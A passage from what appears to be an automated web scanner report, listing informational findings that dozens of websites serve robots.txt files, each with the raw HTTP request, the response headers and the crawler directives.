Last-Modified: Fri, 19 Nov 2010 23:57:45 GMT
Accept-Ranges: bytes
ETag: "b5157a8f4588cb1:39ab"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa OUR DELa STP BUS UNI COM NAV INT CNT STA"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:26:51 GMT
Connection: close

User-agent: *
Disallow: /bin/
Disallow: /TicketBoxOffice.aspx
Disallow: /ticketboxoffice.aspx
Disallow: /purchase/movietickets/ticketboxoffice.aspx

Sitemap: http://www.fandango.com/sitemapindex
...[SNIP]...
24.303. http://www.fanfiction.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fanfiction.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fanfiction.net

Response

HTTP/1.0 200 OK
Server: LiteSpeed
Date: Sat, 02 Apr 2011 13:42:29 GMT
Connection: close
Vary: Accept-Encoding
ETag: "8b-4bfb4c95-0"
Last-Modified: Tue, 25 May 2010 04:05:41 GMT
Content-Type: text/plain
Age: 12
X-Monk: 2

User-agent: *
Disallow: /secure/
Disallow: /rs/
Disallow: /ru/
Disallow: /eye/
Disallow: /m/
Allow: /

User-agent: ia_archiver
Disallow: /
24.304. http://www.fanpop.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fanpop.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fanpop.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Sat, 02 Apr 2011 13:32:52 GMT
Content-Type: text/plain
Content-Length: 105
Last-Modified: Mon, 08 Nov 2010 23:29:45 GMT
Connection: close
Expires: Sat, 02 Apr 2011 13:32:53 GMT
Cache-Control: max-age=1
Accept-Ranges: bytes

User-agent: *
Disallow: /search/
Disallow: /superquiz/
Disallow: /a/
Disallow: /site/go
Disallow: /user/
24.305. http://www.faqs.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.faqs.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.faqs.org

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:36 GMT
Server: Apache
Last-Modified: Thu, 17 Mar 2011 09:50:32 GMT
ETag: "61f85c2-cb-49eaa979b2a00"
Accept-Ranges: bytes
Content-Length: 203
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: terms.html
Disallow: /abstracts/mtc.class.php
Disallow: /knowledge

User-agent: sitebot
Disallow: /

User-agent: businessdbbot
Disallow: /

User-agent: magpie-crawle
Disallow:
...[SNIP]...
24.306. http://www.fark.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fark.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fark.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 13:56:19 GMT
Content-Type: text/plain
Content-Length: 246
Last-Modified: Thu, 06 Jan 2011 07:30:11 GMT
Connection: close
Expires: Sat, 09 Apr 2011 13:56:19 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

User-agent: *
Crawl-delay: 1
Disallow: /nospam/
Disallow: /nomirror/
Allow: /cgi/comments.pl
Allow: /cgi/fark/comments.pl
Allow: /comments
Disallow: /cgi/
Disallow: /users
Disallow: /submit
# $Id: rob
...[SNIP]...
24.307. http://www.farlex.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.farlex.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.farlex.com

Response

HTTP/1.1 200 OK
Content-Length: 33
Content-Type: text/plain
Last-Modified: Tue, 29 Sep 2009 18:26:57 GMT
Accept-Ranges: bytes
ETag: "66329c6d3241ca1:1985"
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:34:45 GMT
Connection: close

User-agent: NPBot
Disallow: /
24.308. http://www.fastcompany.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fastcompany.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fastcompany.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:54:55 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.14
X-Drupal-Cache: MISS
Expires: Sat, 02 Apr 2011 14:14:55 GMT
Last-Modified: Sat, 02 Apr 2011 13:54:55 GMT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
ETag: "1301752495"
Vary: Accept-Encoding
X-Served-By: daa-www014
Content-Length: 2082
Content-Type: text/plain; charset=UTF-8
X-Cache: MISS from VoxCAST
Connection: close

# $Id: robots.txt,v 1.2.2.3 2007/08/05 09:56:41 hass Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by
...[SNIP]...
24.309. http://www.fatwallet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fatwallet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fatwallet.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:41:01 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 29 Dec 2010 20:29:45 GMT
ETag: "ae57f4-2ee-498926e004040"
Accept-Ranges: bytes
Content-Length: 750
Cache-Control: max-age=43200
Expires: Sun, 03 Apr 2011 01:41:01 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

sitemap: http://www.fatwallet.com/sitemap.xml

User-agent: *
Allow: /
Disallow: /automate/
Disallow: /bonusbucks/
Disallow: /cashback/admin/
Disallow: /cashback/admin2/
Disallow: /compare-prices/
Disa
...[SNIP]...
24.310. http://www.fda.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fda.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fda.gov

Response

HTTP/1.0 200 OK
Content-Length: 404
Content-Type: text/plain
Last-Modified: Sat, 30 May 2009 13:05:54 GMT
Accept-Ranges: bytes
ETag: "118ca05d27e1c91:fab"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=1343
Date: Sat, 02 Apr 2011 13:45:05 GMT
Connection: close

#Added for Bristol-Myers on Sept 2005
User-agent: vspider
Disallow: /

#For all other crawlers
User-agent: *
Disallow: /Management/ # don't crawl healthcheck
Hit-rate: 30 # wait 30 second
...[SNIP]...
24.311. http://www.fedex.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fedex.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fedex.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 02 Apr 2011 13:24:33 GMT
Content-length: 24
Content-type: text/plain
X-ua-compatible: IE=EmulateIE7
Set-cookie: fdx_cbid=22185494081301750673092940271330; expires=Monday, 18-January-2038 21:14:07 GMT; path=/; domain=.fedex.com
Last-modified: Thu, 14 Jan 2010 17:35:09 GMT
Connection: close

User-agent: *
Allow: /

24.312. http://www.filehippo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filehippo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.filehippo.com

Response

HTTP/1.1 200 OK
Content-Length: 24
Content-Type: text/plain
Last-Modified: Fri, 14 Jan 2011 12:45:39 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:37:30 GMT
Connection: close

User-agent: *
Disallow:
24.313. http://www.findagrave.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.findagrave.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.findagrave.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:16:27 GMT
Server: Apache
Last-Modified: Wed, 26 Jan 2011 22:16:57 GMT
ETag: "1a788ed-b3-49ac730ef4840"
Accept-Ranges: bytes
Content-Length: 179
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow:

User-agent: myfamilybot
Disallow:
Crawl-delay: 1

User-agent: msnbot
Disallow:
Crawl-delay: 1

User-agent: Slurp
Disallow:
Crawl-delay: 1

24.314. http://www.findgovernmentjobs.info/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.findgovernmentjobs.info
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.findgovernmentjobs.info

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 14:18:40 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-nbjnphkm=60E5ED604407495DAF13C53E35CDBA72; path=/
Last-Modified: Wed, 31 Mar 2010 16:36:07 GMT
Content-Length: 124

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/

User-agent: googlebot
Disallow: *.csi
24.315. http://www.findlocation.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.findlocation.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.findlocation.com

Response

HTTP/1.1 200 OK
Content-Length: 77
Content-Type: text/plain
Last-Modified: Wed, 21 Jul 2010 18:05:21 GMT
Accept-Ranges: bytes
ETag: "b32cc848ff28cb1:49b4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:54:29 GMT
Connection: close

User-agent: *


Disallow:

sitemap: http://findlocation.com/sitemap.xml
24.316. http://www.finishline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.finishline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.finishline.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 24 Aug 2010 19:45:51 GMT
ETag: "406d-e9-327f9c0"
Accept-Ranges: bytes
Content-Length: 233
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 14:03:05 GMT
Connection: close

User-agent: *
Disallow: /store/global/css/
Disallow: /store/global/js/
Disallow: /store/global/fragments
Disallow: /store/foresee/
Disallow: /store/catalog/fragments/coupon.jsp

Sitemap: http
...[SNIP]...
24.317. http://www.fixya.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fixya.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fixya.com

Response

HTTP/1.1 200 OK
Content-Length: 5446
Content-Type: text/plain
Last-Modified: Wed, 23 Feb 2011 08:51:04 GMT
Accept-Ranges: bytes
ETag: "0c86cd36d3cb1:cb95"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:23:53 GMT
Connection: close

User-agent: *
Disallow: /404.aspx
Disallow: /a_hp_sl.aspx
Disallow: /addWidget.aspx
Disallow: /AdvExplanation.aspx
Disallow: /askflow/
Disallow: /asknew/
Disallow: /BecomeAnExpert.aspx
Disallo
...[SNIP]...
24.318. http://www.flickr.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.flickr.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:38:18 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Tue, 01-Apr-2014 12:38:18 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Fri, 02-Apr-2010 12:38:17 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Fri, 02-Apr-2010 12:38:17 GMT; path=/; domain=flickr.com
Vary: Accept-Encoding
X-Served-By: www64.flickr.mud.yahoo.com
Cache-Control: private
Content-Length: 143
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /gp/
Disallow: /report_abuse.gne
Disallow: /abuse
Disallow: /signin
Disallow: /search
Disallow: /groups/10millionphotos
24.319. http://www.flixster.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flixster.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.flixster.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:51:52 GMT
Server: Apache
Last-Modified: Thu, 31 Mar 2011 20:44:52 GMT
ETag: "36c"
Accept-Ranges: bytes
Content-Length: 876
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 13:51:52 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /account
Disallow: /actor/random
Disallow: /admin
Disallow: /address-book
Disallow: /api
Disallow: /bebo
Disallow: /captcha
Disallow: /converse.do
Disallow: /DoNotSend.jsp
Disa
...[SNIP]...
24.320. http://www.flixxy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flixxy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.flixxy.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:45 GMT
Server: Apache
Last-Modified: Sun, 20 Mar 2011 01:41:49 GMT
ETag: "18032730-15d-4d855b5d"
Accept-Ranges: bytes
Content-Length: 349
Connection: close
Content-Type: text/plain

...User-agent: *
Disallow: /logs/
Disallow: /olive/
Disallow: /scripts/
Disallow: 300x250.htm
Disallow: 300x250alt.htm
Disallow: 728x90alt.htm
Disallow: 728x90omakasenoborder.htm
Disallow: nos
...[SNIP]...
24.321. http://www.fly.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fly.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fly.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Tue, 29 Mar 2011 18:49:43 GMT
ETag: "c57a3b1142eecb1:0"
Server: Microsoft-IIS/7.5
X-IP: 113
Cache-Control: max-age=31536000
Date: Sat, 02 Apr 2011 13:34:17 GMT
Content-Length: 978
Connection: close

User-agent: *
Disallow: /GenericError.aspx
Disallow: /genericerror.aspx
Disallow: /TrackClick.aspx
Disallow: /trackclick.aspx
Disallow: /TrackClickScreen.aspx
Disallow: /trackclickscreen.aspx
D
...[SNIP]...
24.322. http://www.food.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.food.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.food.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 16 Feb 2011 10:40:24 GMT
Content-Length: 374
X-Cnection: close
Content-Type: text/plain
Expires: Sat, 02 Apr 2011 15:42:53 GMT
Date: Sat, 02 Apr 2011 13:42:53 GMT
Connection: close
X-N: S

# robots.txt for http://www.food.com/

User-agent: *
Allow:
Disallow: /recipeprint.do*
#Disallow: /about/tour/
#Disallow: /admin/
#Disallow: /alt/
#Disallow: /mail/
#Disallow: /members/photo
...[SNIP]...
24.323. http://www.foodnetwork.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foodnetwork.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.foodnetwork.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 31 Dec 2008 05:27:54 GMT
Accept-Ranges: bytes
Content-Length: 531
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:24:49 GMT
Connection: close

###############################
#
# foodnetwork.com robots.txt file
#
# addresses all robots by using wild card *

User-agent: *

# list folders robots are not allowed to index

Disallow: /cr/
Dis
...[SNIP]...
24.324. http://www.fool.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fool.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fool.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 22 Jul 2010 18:11:12 GMT
Accept-Ranges: bytes
ETag: "008844c929cb1:0"
Server: Microsoft-IIS/7.0
P3P: policyref="http://www.fool.com/w3c/p3p.xml", CP="IDC DSP COR CUR ADMa DEVa TAIa CONo HISa TELo OUR PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE LOC IND"
Set-Cookie: Sookie=source=&fy=false&ybls=0; domain=.fool.com; path=/
Set-Cookie: Wookie=Ref=http%3a%2f%2fnone%2f; domain=.fool.com; expires=Sun, 03-Apr-2011 13:35:39 GMT; path=/
Set-Cookie: Tookie=T=83364804117048773463401338258482; domain=.fool.com; expires=Tue, 30-Mar-2021 04:00:00 GMT; path=/
X-Powered-By: ASP.NET
Set-Cookie: v1st=CB8D7C0F5B4A83A7; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.fool.com
Date: Sat, 02 Apr 2011 13:35:39 GMT
Connection: close
Content-Length: 1015

# $Revision: 73195 $
# /robots.txt file for http://www.fool.com/ (prod)
# Web Application Stress Tool
User-agent: stress-agent
Disallow: /
# else
User-agent: *
Disallow: /Includes
Disallow: /i
...[SNIP]...
24.325. http://www.footballfanatics.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.footballfanatics.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.footballfanatics.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
Content-Type: text/plain
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private, no-cache, no-store, must-revalidate, proxy-revalidate
Expires: Sat, 02 Apr 2011 13:56:55 GMT
Date: Sat, 02 Apr 2011 13:56:55 GMT
Content-Length: 10762
Connection: close
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Wed, 11 Aug 2010 21:02:13 GMT

User-agent: *
Allow: /
Allow: /pages/Coupons
Allow: /pages/League_St_Patricks_Day
Allow: /pages/real_fanatics_care
Allow: /pages/Shop_By_Player
Allow: /pages/Sports_Gifts
Allow: /pages/world_so
...[SNIP]...
24.326. http://www.footlocker.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.footlocker.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.footlocker.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "6c68b248026c6104e682a5deea0e2727:1283874104"
Last-Modified: Tue, 07 Sep 2010 15:41:44 GMT
Accept-Ranges: bytes
Content-Length: 273
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:56:39 GMT
Connection: close
X-N: S

# Modified 09.07.10
User-agent: *
Disallow: /account/
Disallow: /wishlist/
Disallow: /catalog/shoppingCart/
Disallow: /catalog/emptyCart.cfm
Disallow: /shoppingcart/
Disallow: /checkout/
Disallow: /s7
...[SNIP]...
24.327. http://www.forbes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.forbes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.forbes.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:31:03 GMT
Server: Apache/1.3.26
Vary: Accept-Encoding,User-Agent
Last-Modified: Fri, 25 Feb 2011 17:44:32 GMT
ETag: "1c342c2-97-4d67ea80"
Accept-Ranges: bytes
Content-Length: 151
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /static_html/2008/stockcharts/advancedmicrodevices.html
Disallow: /following/
Sitemap: http://www.forbes.com/sitemap_index.xml
24.328. http://www.fotosearch.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fotosearch.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fotosearch.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 02 Apr 2011 13:43:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Content-Length: 7939
Content-Type: text/plain
Set-Cookie: ASPSESSIONIDAQSCSRRR=CDIAKMEDPJAEGPONCEBBLACN; path=/
Cache-control: private

User-agent: psbot
Disallow: /photos-images/
Disallow: /illustration/
Disallow: /clip-art/
Disallow: /video-footage/

User-agent: Gigabot
Disallow: /photos-images/
Disallow: /illustration/
Dis
...[SNIP]...
24.329. http://www.freecreditscore.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freecreditscore.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freecreditscore.com

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 266
Content-Type: text/plain
Last-Modified: Thu, 12 Aug 2010 19:28:03 GMT
ETag: "8063457b543acb1:1dd3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:42:45 GMT
Set-Cookie: BIGipServerfreecreditscore-web-pool=171117322.19999.0000; path=/
X-PvInfo: [S10203.C6485.A6016.RA0.G0.U641686FB].[OT/plaintext.OG/documents]

User-agent: *
Disallow:/Buttons/*
Disallow:/Images/*
Disallow:/idtheft
Disallow: *.asp$
Disallow: *.asp?
Disallow: *&SiteVersionID*
Disallow: *SiteID*
Disallow: /Order
Disallow: /Login
Disal
...[SNIP]...
24.330. http://www.freedownloadmanager.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freedownloadmanager.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freedownloadmanager.org

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Sat, 02 Apr 2011 14:15:08 GMT
Content-Type: text/plain
Content-Length: 189
Last-Modified: Thu, 17 Feb 2011 11:54:52 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /vicman.net
Disallow: /vicman
Disallow: /fdm
Disallow: /admin
Disallow: /board/*.*$
Disallow: /downloads/dir
Disallow: /es/downloads/dir
Disallow: /afterinstall.html
24.331. http://www.freefind.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freefind.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freefind.com

Response

HTTP/1.0 200 OK
Server: FreeFind/8.2
ETag: "8YqRUEEZ3ji"
Last-Modified: Wed, 16 Jun 2010 02:43:26 GMT
Accept-Ranges: bytes
Content-Type: text/plain; charset=utf-8
Content-Length: 682
Date: Sat, 02 Apr 2011 13:42:53 GMT

# this entire site is copyright 1998-2006, FreeFind.com
#
# NOTICE: meta-searching this site is prohibited
#
# keep polite spiders from getting in the machinery
# <!-- FreeFind No Map --> <!-- F
...[SNIP]...
24.332. http://www.freelogs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freelogs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freelogs.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 14:10:07 GMT
ETag: "701a9-45-49ad95507d500"
Last-Modified: Thu, 27 Jan 2011 19:55:32 GMT
Server: Apache/2.2.16 (Amazon)
Content-Length: 69
Connection: Close

User-agent: *
Disallow: /

User-agent: Mediapartners-Google
Allow: /
24.333. http://www.freelotto.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freelotto.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freelotto.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:40:28 GMT
Server: Apache
Last-Modified: Thu, 08 Oct 2009 21:14:16 GMT
ETag: "d49d-e6-47572f223da00"
Accept-Ranges: bytes
Content-Length: 230
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /offer.asp
Disallow: /register_7082a.asp
Disallow: /register_7082b.asp
Disallow: /register_7083.asp
Disallow: /register_ty.asp
Disallow: /register_wait.asp
Disallow: /skyauctio
...[SNIP]...
24.334. http://www.freeonlinegames.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freeonlinegames.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freeonlinegames.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Length: 31
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /ajax/
24.335. http://www.freerepublic.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freerepublic.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freerepublic.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:07:56 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 02:41:56 GMT
ETag: "3208ff-6b-4719dcfbe4500"
Accept-Ranges: bytes
Content-Length: 107
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /perl/
Disallow: /search/
Disallow: /focus/f-news/search
Disallow: /focus/keywords
24.336. http://www.freeridegames.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freeridegames.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freeridegames.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:08 GMT
Server: Apache
Last-Modified: Sat, 22 May 2010 06:16:31 GMT
ETag: "10000000003be-3c-48728bfb1e9f2"
Accept-Ranges: bytes
Content-Length: 60
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /do/installEXEtender/
Allow: /

24.337. http://www.friendster.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.friendster.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.friendster.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:23 GMT
Server: Apache/1.3.39 (Unix)
Hostname: phpqcx10.gbxsc.friendster.com
Last-Modified: Mon, 12 Jun 2006 19:04:27 GMT
ETag: "3a9c58-ac-448dbabb"
Accept-Ranges: bytes
Content-Length: 172
_eep-Alive: timeout=300, max=4998
_onnection: Keep-Alive
Content-Type: text/plain
Via: CN-5000
Connection: close

User-agent: *
disallow: /websearch.php
disallow: /gallery.php
disallow: /usersearch.php
disallow: /group/search.php
disallow: /searchcollege.php
disallow: /searchschool.php
24.338. http://www.frontier.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.frontier.com

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc70bab4eCMYJO; expires=Mon, 2-Apr-2012 14:14:35 GMT; path=/
Content-Length: 54
Content-Type: text/plain
Last-Modified: Sun, 25 Apr 2010 04:41:04 GMT
Accept-Ranges: bytes
ETag: "4140a18331e4ca1:523"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:14:45 GMT
Connection: close

User-agent: *
Disallow: /frontierusage/
Allow: /

24.339. http://www.ft.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ft.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ft.com

Response

HTTP/1.1 200 OK
ETag: "2a5-4c179977"
